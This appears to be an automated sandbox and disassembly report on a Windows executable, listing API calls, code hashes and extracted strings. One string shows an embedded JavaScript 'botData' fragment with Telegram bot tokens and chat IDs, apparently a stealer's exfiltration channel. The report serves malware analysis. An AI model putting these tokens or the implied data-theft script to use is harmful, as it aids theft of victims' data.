                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                  • Instruction ID: 1939e0fac96f3377793d09632888509d113de7ddfea75a27a78d0e9e9bdffa92
                                                                                                                                                                  • Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E11D567E086458AEB149F1AF840AA9B7B1F760BF0F849135C659433C4CE6CD5D1CB50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 4023145424-578493202
                                                                                                                                                                  • Opcode ID: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                  • Instruction ID: c7d4a3f6e4941d33c2ccd2ff31bc190acb66b5b07c3b5a0b4fff47ca5d27778e
                                                                                                                                                                  • Opcode Fuzzy Hash: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                  • Instruction Fuzzy Hash: BCC1B526A0868245FB60AB71AD10BBEA7B0FFA4BE8F804135DE8D47695DF3CD545CB10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00007FF72CA143C2), ref: 00007FF72CA1464F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$InfoLocaleValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3796814847-0
                                                                                                                                                                  • Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                  • Instruction ID: 3d0afdb37bb759f3d81ff46ffc094396b59e1c3de6c6e5cd3566b51a1037adf0
                                                                                                                                                                  • Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                  • Instruction Fuzzy Hash: BD113831B1855242E774A729B940FBAA2B1EB60778F945231D639036C0DE69D8818B10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF72CA1480B,?,00000000,00000092,?,?,00000000,?,00007FF72CA04DC1), ref: 00007FF72CA141AE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                  • Instruction ID: 94b385f8557144eb775fbb75fe845633c8be47706ebb2c37108e5c0322a7141a
                                                                                                                                                                  • Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                  • Instruction Fuzzy Hash: AA01B972F0814546E7106F19FC40BB9B6F1FB707B4F859231D669476C4CFA894819B10
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1500699246-578493202
                                                                                                                                                                  • Opcode ID: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
                                                                                                                                                                  • Instruction ID: eb7b84f6cb1738ff50d39d559e957c439a8b307f9973714f9adfa08550160b05
                                                                                                                                                                  • Opcode Fuzzy Hash: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
                                                                                                                                                                  • Instruction Fuzzy Hash: B7B1FA32A1964686EF64FF21E811AB9B3B0FB60BA8F805231DA4D436C5DF7CE541CB50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                  • Opcode ID: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                  • Instruction ID: 8d58beea350a47e1877370d0d09b0cc53c8cb72fc3a925c56b1938c3a3d6216c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                  • Instruction Fuzzy Hash: 52A13663A487C546EB21DB35A800BADB7A1EB647E4F848131DE8E47791DE3DE801CB11
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                  • Opcode ID: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                  • Instruction ID: b4a7f8995cc79daf55304aeda5c6531340392747eed528ab34f4555e9fdb25be
                                                                                                                                                                  • Opcode Fuzzy Hash: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DB1C37294874586E764DF39C85013CBBB8E765B68FA44235CB8E473A5CF39D851CB20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 485612231-578493202
                                                                                                                                                                  • Opcode ID: 0a04de855e384359884498a592c7ecc487ff7f476ea49e62146686d871cd2c8d
                                                                                                                                                                  • Instruction ID: 33102870819df548c4659e7a2f3ba6163d8917d9ec967e6bd1693216000cbbc9
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a04de855e384359884498a592c7ecc487ff7f476ea49e62146686d871cd2c8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8341F772718A5482FF04DF2AED24569A7B1FB58FE0B449032EE0D87B54DE3CD0418700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                  • Instruction ID: 5659a7848457daeb62ab92df6f8df3ceec2aea3096663a6a0f40c7cd86de71c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                  • Instruction Fuzzy Hash: 02B09220E0BA0AC2EA083B117C43B14A2B4FF68720FC48039C04D62320DF2C21A59B61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: : $*L\(&.$All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
                                                                                                                                                                  • API String ID: 3668304517-589830229
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $*L\(&.$Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 3668304517-1448338793
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: for detail.$See
                                                                                                                                                                  • API String ID: 3668304517-4250990345
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: 0$0$0
                                                                                                                                                                  • API String ID: 3215553584-3137946472
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                                  • String ID: ", "$*L\(&.$: "
                                                                                                                                                                  • API String ID: 2261858363-377368453
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: replacement $*L\(&.$Nothing found
                                                                                                                                                                  • API String ID: 4261731725-278487610
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                  • API String ID: 4121308752-1062449267
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: *L\(&.$csm$csm$csm
                                                                                                                                                                  • API String ID: 849930591-732470473
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72CA091C8,?,?,?,?,00007FF72CA01FDD,?,?,?,?,00007FF72C9EEAF8), ref: 00007FF72CA08A6C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72CA091C8,?,?,?,?,00007FF72CA01FDD,?,?,?,?,00007FF72C9EEAF8), ref: 00007FF72CA08A78
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: *L\(&.$api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-1426591958
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2506987500-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-1247241052
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2829165498-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00007FF72C9F2225
                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F2244
                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F2266
                                                                                                                                                                  • sys_get_time.LIBCPMT ref: 00007FF72C9F2281
                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F22A7
                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF72C9F1192,?,?,?,00007FF72C9D9640), ref: 00007FF72C9F22BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 184115430-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2081738530-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
• Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2081738530-578493202
                                                                                                                                                                  • Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                  • Instruction ID: ec7b64631a50539443ea13454d8d4be589d6bff56e4de90231c9f6defce3ae27
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E315422A0CA4181EB10FB15FC54569F371FB647B4F980132DA9D076E9DE3DE491CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                  • Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                  • Instruction ID: 291d836e62c2c9b177406e872983926a28c55aff0c2554a1311680411a08b0a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                  • Instruction Fuzzy Hash: AD12A361E0816386FB247E28B954BB9F6B1FB607B8FC44135DA89476C4DB3DE5808F24
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: *L\(&.$csm$csm$csm
                                                                                                                                                                  • API String ID: 3523768491-732470473
                                                                                                                                                                  • Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                  • Instruction ID: eb5650a1782541208ecfa554aa87767240075be3fec505fcf2028b4ab74ff135
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                  • Instruction Fuzzy Hash: BDE1A572A087818AE720EF24D8812BDB7B8FB65768F940135DACD47656DF38E585CF20
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.$*L\(&.$*L\(&.$*L\(&.$*L\(&.
                                                                                                                                                                  • API String ID: 3215553584-3136492305
                                                                                                                                                                  • Opcode ID: 059a6e08268c2f9faa8372692d1d41bcdcabe47e84e6cf3d2dc5b30d4cf9302e
                                                                                                                                                                  • Instruction ID: 2e7182f937c7af8f6c209e151f741ee76bcebc3da8bd8cbd4edf0b06bf27ace3
                                                                                                                                                                  • Opcode Fuzzy Hash: 059a6e08268c2f9faa8372692d1d41bcdcabe47e84e6cf3d2dc5b30d4cf9302e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F61A521D2868242F668BB35BD44B39E6B0FFA07E5F944535CA8D13794DE3CF805AE20
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1386471777-1405518554
                                                                                                                                                                  • Opcode ID: de62b78635319d599e7abc9212b61aa2d4140ddebcaf5cc7c9bfc3a8eae7ccac
                                                                                                                                                                  • Instruction ID: e65593551730a5b7559641757a9d43141b80c4c113e358d6c34d26b56ce908b1
                                                                                                                                                                  • Opcode Fuzzy Hash: de62b78635319d599e7abc9212b61aa2d4140ddebcaf5cc7c9bfc3a8eae7ccac
                                                                                                                                                                  • Instruction Fuzzy Hash: 21518C22B09B819AFB20EBB0D8502BC7374FF64758F884135DE8D26A56CF38E556C720
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$exists$status
                                                                                                                                                                  • API String ID: 1686256323-596945323
                                                                                                                                                                  • Opcode ID: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                  • Instruction ID: 893338b2d5b27647748bb7b4d81126eb0d7fdda8e393f9a2245d8bab69cf98cf
                                                                                                                                                                  • Opcode Fuzzy Hash: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                  • Instruction Fuzzy Hash: AA41D723F14A459AF700EBB4E8012FCA371EF69768F804632DE5D22AD9EE38D546C750
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81BF
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81E9
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F8257
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F8263
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                  • Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                  • Instruction ID: aa6b98354fe377f462866dae191edb6b44a8d2f4b1417153dfc18fdff9f87485
                                                                                                                                                                  • Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
